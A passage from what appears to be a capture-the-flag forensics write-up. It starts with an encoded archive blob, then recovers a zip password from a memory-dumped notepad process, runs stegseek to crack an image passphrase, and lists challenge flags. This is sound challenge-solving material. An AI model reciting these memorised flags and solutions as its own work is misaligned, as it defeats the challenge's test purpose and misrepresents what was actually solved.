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
Initially we thought the zip file had to be brute forced, but after asking the authors about it, they mentioned that the password can be retrieved normally via other methods. Spending some time on this, I noticed a suspicious notepad process running in the memory dump.
This suggests the classic data visualising method with GIMP. Dumping the notepad process and renaming its file extension to .data
, the zip password can be obtained.
However, the image was not the flag. Being stuck on this for awhile, our leader @suvoni managed to figure out the method to obtain the flag.
By utilizing stegseek, the flag can be obtained.
1
2
3
4
5
6
7
8
9
└─$ stegseek flag.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "palestine4life"
[i] Original filename: "flag.txt".
[i] Extracting to "flag.jpg.out".
└─$ cat flag.jpg.out
AKASEC{05-10-2023_free_palestine}
Interception [Forensics]
Question: We fragmented a critical piece of information (the flag) into ten distinct segments. These segments were subsequently uploaded to a machine utilizing a containerization technology known as Docker. Is it feasible to recover and reassemble all the fragmented data?
Flag: AKASEC{H1ppOp0t0mO_NsTrosEsquIpEdal10pHOBIAtheRApEut1cAlizAt10nist1C}
We are given a Linux system dump to investigate. I will not be doing a detailed writeup on this challenge since it was basically just treasure hunting with grep to find 10 flag parts.